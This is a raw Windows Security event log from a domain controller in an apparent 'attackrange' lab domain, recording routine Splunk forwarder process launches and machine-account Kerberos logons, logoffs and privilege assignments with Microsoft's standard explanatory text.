Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265028
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265030
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a88
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265029
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x104c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265031
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1734
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265037
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AA622
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265036
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AA622
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64904
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265035
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AA622
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265034
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AA5B6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265033
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AA5B6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 64903
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:52:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265032
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AA5B6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:52:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265040
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AB109
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:52:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265039
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AB109
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64910
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:52:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265038
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AB109
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:53:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265041
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x153c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265043
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x195c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265042
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bfc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265044
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1648
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265045
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265047
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1474
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265046
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1af8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:53:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265050
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AEA74
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:53:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265049
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8AEA74
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64924
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:53:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265048
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AEA74
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:54:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265051
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf5c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
